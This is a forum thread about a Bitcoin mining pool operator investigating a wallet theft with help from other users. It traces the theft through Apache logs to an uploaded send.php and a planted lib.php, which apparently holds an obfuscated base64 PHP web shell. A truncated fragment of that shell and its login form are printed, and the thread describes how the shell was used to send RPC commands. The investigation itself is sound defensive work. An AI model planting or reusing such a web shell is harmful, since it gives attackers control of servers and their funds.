Looks like my BTC wallet was hacked

[theonegilly]

been speaking to tommo on tompool.org and ive thought of one possible way that the coins were taken.

The server has a mirrored raid setup so it would be easy for the hosting provide to take out the second set of HDDs and set them put in a secondary system and make the commands to send the coins. It seems very simple but it could have been done.

[fcmatt]

been speaking to tommo on tompool.org and ive thought of one possible way that the coins were taken.

The server has a mirrored raid setup so it would be easy for the hosting provide to take out the second set of HDDs and set them put in a secondary system and make the commands to send the coins. It seems very simple but it could have been done.

the server would have logs in /var/log/messages saying the server noticed HDs removed.
you cannot yank hard drives without the server knowing. well in most cases i know of. raid controllers are pretty
verbose when it comes to drives just being pulled.

[Tommo_Aus]

2.0.18.8 I imagine. word on the street is that you have a problem. the update checker in the forum. i checked. you still have that code in your forum. the new version removes it.

Lets say that's it, would there be anything I could check to confirm this happened?

[fcmatt]

2.0.18.8 I imagine. word on the street is that you have a problem. the update checker in the forum. i checked. you still have that code in your forum. the new version removes it.

Lets say that's it, would there be anything I could check to confirm this happened?

show us www logs right around the rpc call was made. do you see any POSTS or strange files being called by the webserver?

give us 100 lines before and after the time the rpc call was made.

and i have to admit the faster you feed us info the better.

[theonegilly]

true.. true.. but the company might be dodgie... setting up things so if they did want to do anything they could.

[Tommo_Aus]

and i have to admit the faster you feed us info the better.

I'll grab it ASAP, unfortunately some real life bits and pieces have to be attended to before I can grab this info.

[fcmatt]

true.. true.. but the company might be dodgie... setting up things so if they did want to do anything they could.

i admit the idea has merit but i have not encountered a single linux box in my career that did not complain loudly in the logs that disks were removed. raid controller bios has no option to disable that stuff. that would mean a custom linux distro was installed to disable it? doubtful.

but going through message files looking for the disks being removed is pretty simple.. depending on how far back you wish to look. log rotation might only allow several days to look back.

what would concern me more is some automated backup process they offer that is automagically installed on the server for the customer or he is using iscsi from the server to a large storage box. THEN the isp could view the backups of that or even connect to the storage box themselves.

[Tommo_Aus]

I've been looking at the www logs, this gives me a suspicious feeling unless its a complete coincidence...

BTC stolen at these times (in PST, which is the servers timezone):

Feb 16 2014 15:11:47
Feb 16 2014 15:14:12
Feb 17 2014 10:15:30

Apache logs:

94.231.83.139 - - [16/Feb/2014:15:11:46 -0800] "POST /tompoolforum/cache/Smarty/2/send.php HTTP/1.1" 200 1711 "http://tompool.org:81/tompoolforum/cache/Smarty/2/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0"
94.231.83.139 - - [16/Feb/2014:15:14:11 -0800] "POST /tompoolforum/cache/Smarty/2/send.php HTTP/1.1" 200 1714 "http://tompool.org:81/tompoolforum/cache/Smarty/2/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0"
77.109.138.42 - - [17/Feb/2014:10:15:30 -0800] "POST /tompoolforum/cache/Smarty/2/send.php HTTP/1.1" 200 1714 "http://tompool.org:81/tompoolforum/cache/Smarty/2/index.php" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0"

Both IP's are located in Switzerland according to a Google search, the Smarty/2/send.php doesn't exist in the folder anymore. Am I onto something?

[fcmatt]

I've been looking at the www logs, this gives me a suspicious feeling unless its a complete coincidence...

BTC stolen at these times (in PST, which is the servers timezone):

Feb 16 2014 15:11:47
Feb 16 2014 15:14:12
Feb 17 2014 10:15:30

Apache logs:

94.231.83.139 - - [16/Feb/2014:15:11:46 -0800] "POST /tompoolforum/cache/Smarty/2/send.php HTTP/1.1" 200 1711 "http://tompool.org:81/tompoolforum/cache/Smarty/2/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0"
94.231.83.139 - - [16/Feb/2014:15:14:11 -0800] "POST /tompoolforum/cache/Smarty/2/send.php HTTP/1.1" 200 1714 "http://tompool.org:81/tompoolforum/cache/Smarty/2/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0"
77.109.138.42 - - [17/Feb/2014:10:15:30 -0800] "POST /tompoolforum/cache/Smarty/2/send.php HTTP/1.1" 200 1714 "http://tompool.org:81/tompoolforum/cache/Smarty/2/index.php" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0"

Both IP's are located in Switzerland according to a Google search, the Smarty/2/send.php doesn't exist in the folder anymore. Am I onto something?

Yes. Disable forum software. It has too many holes to run on the pool server.

Find out what file they read to get rpc passwd and username. They had to.

[Tommo_Aus]

There seems to be a common flow of requests, it goes:

77.109.138.42 - - [17/Feb/2014:10:11:20 -0800] "GET /tompoolforum/cache/Smarty/2/index.php HTTP/1.1" 200 3170 "http://tompool.org:81/tompoolforum/cache/Smarty/2/send.php" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0"

... then moments later ...

77.109.138.42 - - [17/Feb/2014:10:11:25 -0800] "POST /tompoolforum/cache/Smarty/2/send.php HTTP/1.1" 200 1952 "http://tompool.org:81/tompoolforum/cache/Smarty/2/index.php" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0"

Problem being these files don't exist anymore so I don't know what's in them.

[Tommo_Aus]

Interesting, I've also found a call to the file tompoolforum/library/lib.php, but I don't see this file in the vanilla forums project git. Viewing the file it looks like this:

<?php
$o="QAEAOzh3b3cKDQAjYnV1aHVYdWIAAHdodXNuaWAvMC48Cg1HdGIAAHNYamZgbmRYdnJoc2J0WHUAgHJ pc25qYi83AfFoZVh0c2Z1JABzLwDRI2oBkSc6J2J/d2toY2IAEy8gJ ... (about 40 thousand characters more) ... RsbGxsbGxsbGwpOw=="));return;?>

If I load the page the source looks like this:

<style type="text/css">
   input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
</style>
<form method="POST" action="">
   <span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
   <input type="hidden" name="doing" value="login">
   <input type="submit" value="Login">
</form>

It renders as a password input field with a Login button.

[fcmatt]

There seems to be a common flow of requests, it goes:

77.109.138.42 - - [17/Feb/2014:10:11:20 -0800] "GET /tompoolforum/cache/Smarty/2/index.php HTTP/1.1" 200 3170 "http://tompool.org:81/tompoolforum/cache/Smarty/2/send.php" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0"

... then moments later ...

77.109.138.42 - - [17/Feb/2014:10:11:25 -0800] "POST /tompoolforum/cache/Smarty/2/send.php HTTP/1.1" 200 1952 "http://tompool.org:81/tompoolforum/cache/Smarty/2/index.php" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0"

Problem being these files don't exist anymore so I don't know what's in them.

that is not surprising that the files are gone. also the IP address is a tor exit node. helping people keep their privacy and assisting hackers all day long. essentially the hacker can somehow upload a file to your cache directory which probably has permissions allowing write to the webserver. they they post some info to it to call the rpc command.

i think you found the problem. to learn anymore would probably require i to access your server but i do not think either of us want that. your best bet is to completely remove the forum software and if you want forum software again run it on a totally different server.. a throw away box.

[fcmatt]

Interesting, I've also found a call to the file tompoolforum/library/lib.php, but I don't see this file in the vanilla forums project git. Viewing the file it looks like this:

<?php
$o="QAEAOzh3b3cKDQAjYnV1aHVYdWIAAHdodXNuaWAvMC48Cg1HdGIAAHNYamZgbmRYdnJoc2J0WHUAgHJ pc25qYi83AfFoZVh0c2Z1JABzLwDRI2oBkSc6J2J/d2toY2IAEy8gJ ... (about 40 thousand characters more) ... RsbGxsbGxsbGwpOw=="));return;?>

If I load the page the source looks like this:

<style type="text/css">
   input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
</style>
<form method="POST" action="">
   <span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
   <input type="hidden" name="doing" value="login">
   <input type="submit" value="Login">
</form>

It renders as a password input field with a Login button.

that is probably a base64 encrypted php chunk/file that the attacker used to run commands on your server.
they do a POST to it logging in and then running a command. i have seen them before. quite common.
seeing that is contains that much data means it could be a whole webpage of commands for the script kid to run.

feel free to post the whole thing here. lets convert it to ascii

[Tommo_Aus]

Yep I'm quite convinced the forum was the weakness, I've taken the forum out so that'll be the back door gone at least, unless they built something else in while they were there.

Now I need to work out if I get back up again or call it a day.

[fcmatt]

Yep I'm quite convinced the forum was the weakness, I've taken the forum out so that'll be the back door gone at least, unless they built something else in while they were there.

Now I need to work out if I get back up again or call it a day.

well they could only write to places where www could write.. and only run commands from the www dirs... so that limits what they could have done. but keep in mind that some are clever. they could have run a script that starts a process that listens on a high port.. then deleted the file.. it would stick around until a reboot.

it is prob in your best interest to move the www dir to a backup place in /blah. then move over file by file of things you trust that were not able to be written to by www.. and rebuild the www back.

[Goldshredder]

Yep I'm quite convinced the forum was the weakness, I've taken the forum out so that'll be the back door gone at least, unless they built something else in while they were there.

Now I need to work out if I get back up again or call it a day.

Dunno. You were evolving your pool really well though. I was impressed. So sorry to hear about this!

[apap100]

Wow this sucks!  Have only been mining with Tom for a few days and was happy to be working with an Aus local pool. Oh well if you come back Tom I will point my miners back to you pool for sure, it was just so convenient mining and getting paid in btc each day.

[freakingcat]

Yep I'm quite convinced the forum was the weakness, I've taken the forum out so that'll be the back door gone at least, unless they built something else in while they were there.

Now I need to work out if I get back up again or call it a day.

I highly appreciate the work you have done on the pool and I would be eager to see it develop in future. Is there any way to send you some alt coins as donation. I am sure they many would support this idea so maybe if we all pull together we can make up for the loss, you take a few days off to clear your head and start afresh?

We love tompool!

[tertius993]

Just to say I literally just started mining on your pool in the last day or two and I am very sorry to hear what happened.

As far as I can see you are one of the very few pools offering SHA profitability switching and payouts in BTC, so I would love to see the pool back online.

Don't let the bastards win.

[eclipso]

I have been mining off and on for a while and really liked the interface and can tell you put a lot of work into it.  Don't let those bastards win.  I for one have faith that you are telling the truth and will defend Tom Pool's honor if anyone posts any negative bullshit on this or any other forum.  Just Zero everyone's account out and start over.  I'm down with sending you some coin as a donation to help you rebuild.  Just let the members know what we can do to help.